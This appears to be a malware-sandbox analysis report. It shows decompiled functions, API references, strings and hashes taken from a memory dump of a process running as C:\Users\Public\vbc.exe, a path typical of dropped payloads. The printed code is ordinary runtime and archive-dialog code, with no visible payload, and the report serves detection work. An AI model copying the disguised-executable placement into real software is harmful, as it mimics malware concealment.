0x00288547
0x0028854a
0x0028855c
0x00288561
0x00288563
0x0028856e
0x00288575
0x0028857a
0x0028857d
0x0028857f
0x00000000
0x00000000
0x00000000
0x00000000
0x00288565
0x00288565
0x00000000
0x00288565
0x0028854c
0x0028854c
0x0028854d
0x0028854d
0x00288552
0x0028858d
0x0028858e
0x00288594
0x00288599
0x0028859c
0x0028859d
0x0028859e
0x002885a5
0x002885a7
0x002885a9
0x002885ae
0x002885b1
0x002885bf
0x002885cb
0x002885ce
0x002885d1
0x002885e3
0x002885e8
0x002885ea
0x002885f5
0x002885fb
0x00288603
0x00288605
0x00000000
0x00000000
0x00000000
0x00000000
0x002885ec
0x002885ec
0x00000000
0x002885ec
0x002885d3
0x002885d3
0x002885d4
0x002885d4
0x00288607
0x00288608
0x00288608
0x002885b3
0x002885b9
0x002885bd
0x00288610
0x00288611
0x00288617
0x00000000
0x00000000
0x00000000
0x002885bd
0x0028861e
0x0028861e
0x0028852c
0x00288532
0x00288536
0x00288581
0x00288582
0x0028858c
0x00000000
0x00000000
0x00000000
0x00288536

APIs

GetLastError.KERNEL32(?,002A00E0,00283394,002A00E0,?,?,00282E0F,?,?,002A00E0), ref: 0028851A
_free.LIBCMT ref: 0028854D
_free.LIBCMT ref: 00288575
SetLastError.KERNEL32(00000000,?,002A00E0), ref: 00288582
SetLastError.KERNEL32(00000000,?,002A00E0), ref: 0028858E
_abort.LIBCMT ref: 00288594

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: e1882dd8770c25c6f780184ccc16fb19c03e3fb6f31b0a3583dcb2ec0c77701a
Instruction ID: c023048eb80286156c829ede7b33f12af4e2c028b920bde34eace7243ec41386
Opcode Fuzzy Hash: e1882dd8770c25c6f780184ccc16fb19c03e3fb6f31b0a3583dcb2ec0c77701a
Instruction Fuzzy Hash: D7F0F43D1A7601A6C3157B347C4AF2B226D8BD1761BBA0215F518A21D2EE24CA718720

Uniqueness

Uniqueness Score: -1.00%

Function 00286C73, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00286C73(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0028A7B3(_t52);
					GetModuleFileNameA(0, 0x2c02b8, 0x104);
					_t49 =  *0x2c0868; // 0x332b68
					 *0x2c0870 = 0x2c02b8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x2c02b8;
					}
					_v8 = 0;
					_v16 = 0;
					E00286D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00286F0C(_v8, _v16, 1);
					if(_t64 != 0) {
						E00286D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0028A2CE(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x2c085c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x2c0860 = _t59;
									L16:
									E00287A50(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x2c085c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x2c0860 = _t43;
						goto L10;
					} else {
						_t44 = E00287ECC();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00287A50(_t64);
						return _t50;
					}
				} else {
					_t45 = E00287ECC();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00287DAB();
					return _t65;
				}
			}

0x00286c73
0x00286c80
0x00286ca0
0x00286cb3
0x00286cb9
0x00286cbf
0x00286cc7
0x00286cce
0x00286cce
0x00286cd3
0x00286cda
0x00286ce1
0x00286cf3
0x00286cfa
0x00286d19
0x00286d25
0x00286d40
0x00286d43
0x00286d4a
0x00286d50
0x00286d57
0x00286d5a
0x00286d5c
0x00286d60
0x00286d6a
0x00286d6a
0x00286d6c
0x00286d72
0x00286d75
0x00286d77
0x00286d7d
0x00286d7e
0x00286d84
0x00000000
0x00000000
0x00000000
0x00000000
0x00286d62
0x00286d62
0x00286d62
0x00286d65
0x00286d66
0x00000000
0x00286d62
0x00286d52
0x00000000
0x00286d52
0x00286d2b
0x00286d30
0x00286d32
0x00286d34
0x00000000
0x00286cfc
0x00286cfc
0x00286d01
0x00286d03
0x00286d04
0x00286d39
0x00286d39
0x00286d87
0x00286d88
0x00000000
0x00286d91
0x00286c88
0x00286c88
0x00286c8f
0x00286c90
0x00286c92
0x00000000
0x00286c97

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000104), ref: 00286CB3
_free.LIBCMT ref: 00286D7E
_free.LIBCMT ref: 00286D88

Strings

C:\Users\Public\vbc.exe, xrefs: 00286CAA, 00286CB1, 00286CE0, 00286D18
h+3, xrefs: 00286CB9

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\Public\vbc.exe$h+3
API String ID: 2506810119-283325683
Opcode ID: 27b71985a778f99cc23e67311d431b0c3340e189c5f2e8e71634a66904764a59
Instruction ID: c7bb99273ff1f36da4b394853b270f463746375126f3af25748f52e9a445854a
Opcode Fuzzy Hash: 27b71985a778f99cc23e67311d431b0c3340e189c5f2e8e71634a66904764a59
Instruction Fuzzy Hash: A6319079A21218EFDB21EF99D889D9EBBF8EB84310F104166F80497291D6709E60CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0027C2A7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0027C2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				struct HWND__* _t18;
				intOrPtr _t19;
				void* _t20;
				signed short _t23;

				_t16 = _a16;
				_t23 = _a12;
				_t19 = _a8;
				_t18 = _a4;
				if(E002612D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t20 = _t19 - 0x110;
				if(_t20 == 0) {
					 *0x2bde34 = _t16;
					SetDlgItemTextW(_t18, 0x66, _t16);
					SetDlgItemTextW(_t18, 0x68,  *0x2bde34);
					goto L10;
				}
				if(_t20 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t23 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t18, 0x68,  *0x2bde34, 0x800);
					_push(1);
					L7:
					EndDialog(_t18, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0027c2a8
0x0027c2ad
0x0027c2b2
0x0027c2b7
0x0027c2cf
0x0027c32f
0x00000000
0x0027c331
0x0027c2d1
0x0027c2d7
0x0027c31c
0x0027c322
0x0027c32d
0x00000000
0x0027c32d
0x0027c2dc
0x0027c2eb
0x00000000
0x0027c2eb
0x0027c2e1
0x0027c2e4
0x0027c308
0x0027c30e
0x0027c2f1
0x0027c2f2
0x00000000
0x0027c2f2
0x0027c2e9
0x0027c2ef
0x00000000
0x0027c2ef
0x00000000

APIs

Part of subcall function 002612D7: GetDlgItem.USER32(00000000,00003021), ref: 0026131B
Part of subcall function 002612D7: SetWindowTextW.USER32(00000000,002922E4), ref: 00261331

EndDialog.USER32(?,00000001), ref: 0027C2F2
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0027C308
SetDlgItemTextW.USER32(?,00000066,?), ref: 0027C322
SetDlgItemTextW.USER32(?,00000068), ref: 0027C32D

Strings

RENAMEDLG, xrefs: 0027C2BF

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: b3f2bc5a23f75f0e2b2c04cebef5eb0e9662e23f2527a6f1a8aae5d30f261882
Instruction ID: aaabeaca333280e20a3cf2d362d209464475d515eaa513ae4f7912ad11afc40a
Opcode Fuzzy Hash: b3f2bc5a23f75f0e2b2c04cebef5eb0e9662e23f2527a6f1a8aae5d30f261882
Instruction Fuzzy Hash: DD0128336602267BD2115EB46D4DF777B6CE75AB10F20C01AF705B60D1C2B2AC209771

Uniqueness

Uniqueness Score: -1.00%

Function 00286B78, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00286B78(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				intOrPtr* _t20;
				signed int _t22;

				_t10 =  *0x29d668; // 0xd26a0a57
				_v8 = _t10 ^ _t22;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t20 = GetProcAddress(_v12, "CorExitProcess");
					if(_t20 != 0) {
						 *0x292260(_a4);
						_t12 =  *_t20();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				return E0027E203(_t12, _v8 ^ _t22);
			}

0x00286b7f
0x00286b86
0x00286b89
0x00286b8d
0x00286b98
0x00286ba0
0x00286bb1
0x00286bb5
0x00286bbc
0x00286bc2
0x00286bc2
0x00286bc4
0x00286bc9
0x00286bce
0x00286bce
0x00286be1

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00286B29,?,?,00286AC9,?,0029A800,0000000C,00286C20,?,00000002), ref: 00286B98
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000002,?,?,?,00286B29,?,?,00286AC9,?,0029A800,0000000C,00286C20,?,00000002), ref: 00286BAB
FreeLibrary.KERNEL32(00000000,?,?,?,00286B29,?,?,00286AC9,?,0029A800,0000000C,00286C20,?,00000002,00000000), ref: 00286BCE

Strings

mscoree.dll, xrefs: 00286B91
CorExitProcess, xrefs: 00286BA3

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b96a5a4a89631400a4daa12ffcd0558d04c4613de696e0911fa211dbb363601f
Instruction ID: 79a12e4f13f9df5f2c18c8b60d10720421d995006ba4482c4b7af0415e170bba
Opcode Fuzzy Hash: b96a5a4a89631400a4daa12ffcd0558d04c4613de696e0911fa211dbb363601f
Instruction Fuzzy Hash: 9BF04F35A15219FBDB15AFA0EC0DF9EBFB9EB04719F000066F809E2190DB715E69DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0026E7E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0026E7E3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E0026FCFD(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x0026e7e4
0x0026e7ea
0x0026e7f1
0x0026e7f6
0x0026e7fa
0x0026e80f
0x0026e812
0x0026e818
0x0026e818
0x0026e81b
0x00000000
0x0026e81b
0x0026e820

APIs

Part of subcall function 0026FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0026FD18
Part of subcall function 0026FCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,0026E7F6,Crypt32.dll,?,0026E878,?,0026E85C,?,?,?,?), ref: 0026FD3A

GetProcAddress.KERNEL32(00000000,CryptProtectMemory,Crypt32.dll,?,0026E878,?,0026E85C,?,?,?,?), ref: 0026E802
GetProcAddress.KERNEL32(002A7350,CryptUnprotectMemory,?,0026E85C,?,?,?,?), ref: 0026E812

Strings

CryptUnprotectMemory, xrefs: 0026E808
CryptProtectMemory, xrefs: 0026E7FC
Crypt32.dll, xrefs: 0026E7EC

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: acf865264e49036bbd4d33429b5b5b009185b07ee5b625f1ee217d8f622359e8
Instruction ID: 92069f3e74b676d7019149a92128978b8a27f081302898ef3dacad17e226f6b2
Opcode Fuzzy Hash: acf865264e49036bbd4d33429b5b5b009185b07ee5b625f1ee217d8f622359e8
Instruction Fuzzy Hash: D8E046B0521A43FACF009B38A808A01FBA86F22B00B10C126A424D3A65DBB4D0B8CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00287389, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00287389(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x29d668; // 0xd26a0a57
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E002869A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0027DB10(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0027DB10(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0027DB10(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0028AC29(_t56);
						_t40 = E00287A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0028AC29(_t56);
						E00287A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x29d668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x00287389
0x00287393
0x00287397
0x00287399
0x0028739d
0x002873a7
0x002873b8
0x002873bd
0x002873bf
0x002873c1
0x002873c3
0x002873c5
0x002873c9
0x00287483
0x00287491
0x00287493
0x00287498
0x0028749f
0x002874a1
0x002874af
0x002874be
0x002874c1
0x002874c3
0x00000000
0x002874c4
0x002873d1
0x002873d6
0x002873db
0x002873dd
0x002873dd
0x002873df
0x002873e4
0x002873e8
0x002873e8
0x002873eb
0x0028740a
0x0028740a
0x0028740c
0x0028740f
0x00287418
0x0028741b
0x00287420
0x00287423
0x00287428
0x00000000
0x00000000
0x0028742a
0x00000000
0x002873ed
0x002873ed
0x002873ef
0x002873f8
0x002873fb
0x00287400
0x00287403
0x00287408
0x00287432
0x00287435
0x00287437
0x0028743a
0x00287442
0x00287448
0x0028744f
0x00287451
0x00287459
0x00287468
0x0028746c
0x0028746e
0x00287471
0x00000000
0x00000000
0x00287473
0x00287476
0x00287478
0x00287478
0x00287479
0x0028747b
0x0028747e
0x00000000
0x00287478
0x00000000
0x00287408
0x002873eb
0x00000000

APIs

_free.LIBCMT ref: 002873FB
_free.LIBCMT ref: 0028741B

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f1a5cdeccc62054ae756e837805036bdd24ed9f27869ac22f126fbc6faeea598
Instruction ID: 3b71792441e1b66231838016ebec29edfbe7153aa14c4247bbe8bc058f60ae62
Opcode Fuzzy Hash: f1a5cdeccc62054ae756e837805036bdd24ed9f27869ac22f126fbc6faeea598
Instruction Fuzzy Hash: 0041133AA112009FCB10EF78C881A5EB7B5EF88314F2545A9E519EB381DB31ED11CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0028ABA6, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0028ABA6() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0028AB6F(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00287A8A(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00287A50(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x0028abb5
0x0028abbb
0x0028ac13
0x0028ac13
0x0028abbd
0x0028abbe
0x0028abc3
0x0028abcc
0x0028abd2
0x0028abd8
0x0028abdd
0x00000000
0x0028abdf
0x0028abe5
0x0028abea
0x0028ac08
0x0028ac02
0x0028ac02
0x0028ac04
0x0028ac04
0x0028ac0b
0x0028ac10
0x0028abdd
0x0028ac17
0x0028ac1a
0x0028ac1a
0x0028ac28

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0028ABAF
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0028ABD2

Part of subcall function 00287A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00282FA6,?,0000015D,?,?,?,?,00284482,000000FF,00000000,?,?), ref: 00287ABC

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0028ABF8
_free.LIBCMT ref: 0028AC0B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0028AC1A

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 69c444bad014e8bc3f2a28f52aafeed05c6755f45630f363a3eea1bfdaf3903e
Instruction ID: 980cd394fae8f058e74fb321f7274de2ce720f41e56504169d62bf697cb86637
Opcode Fuzzy Hash: 69c444bad014e8bc3f2a28f52aafeed05c6755f45630f363a3eea1bfdaf3903e
Instruction Fuzzy Hash: BA0188766236157F33212A7A6C8DC7F7A6DDAC6B60315011BFD04D2181DE61CD1197F1

Uniqueness

Uniqueness Score: -1.00%

Function 0028859A, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0028859A(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x29d6ac; // 0x4
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00287B1B(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00289BA9(_t13, _t17, __eflags,  *0x29d6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00288388(_t13, _t16, 0x2c0418);
							E00287A50(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00287A50();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00289B53(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x0028859a
0x002885a5
0x002885a7
0x002885a9
0x002885ae
0x002885b1
0x002885bf
0x002885cb
0x002885ce
0x002885d1
0x002885e3
0x002885e8
0x002885ea
0x002885f5
0x002885fb
0x00288603
0x00288605
0x00000000
0x00000000
0x00000000
0x00000000
0x002885ec
0x002885ec
0x00000000
0x002885ec
0x002885d3
0x002885d3
0x002885d4
0x002885d4
0x00288607
0x00288608
0x00288608
0x002885b3
0x002885b9
0x002885bd
0x00288610
0x00288611
0x00288617
0x00000000
0x00000000
0x00000000
0x002885bd
0x0028861e

APIs

GetLastError.KERNEL32(?,?,?,00287ED1,00287B6D,?,00288544,00000001,00000364,?,00282E0F,?,?,002A00E0), ref: 0028859F
_free.LIBCMT ref: 002885D4
_free.LIBCMT ref: 002885FB
SetLastError.KERNEL32(00000000,?,002A00E0), ref: 00288608
SetLastError.KERNEL32(00000000,?,002A00E0), ref: 00288611

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e7c979a1490c8874e7d55f0dc23de2ee558674f99d4cd39bf8eaf01ff1317216
Instruction ID: 430d5010b67b13bf99632ebc77ed2e8d7c82e42b37923116088fb8736aaafb97
Opcode Fuzzy Hash: e7c979a1490c8874e7d55f0dc23de2ee558674f99d4cd39bf8eaf01ff1317216
Instruction Fuzzy Hash: A101213E277601AAC3127A307C89A3B226D9BD03647B60129F815A22C2EE658D358724

Uniqueness

Uniqueness Score: -1.00%

Function 002703C7, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E002703C7(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00291161);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00270697(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E002704BA(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x002703c7
0x002703d0
0x002703d2
0x002703d7
0x002703d8
0x002703e2
0x002703e4
0x002703e9
0x002703eb
0x002703fb
0x00270407
0x00270409
0x0027040c
0x0027040e
0x00270415
0x0027041b
0x0027041c
0x0027041f
0x0027040c
0x0027042e
0x0027043a
0x00270446
0x00270451
0x0027045c

APIs

Part of subcall function 00270697: ResetEvent.KERNEL32(?), ref: 002706A9
Part of subcall function 00270697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002706BD

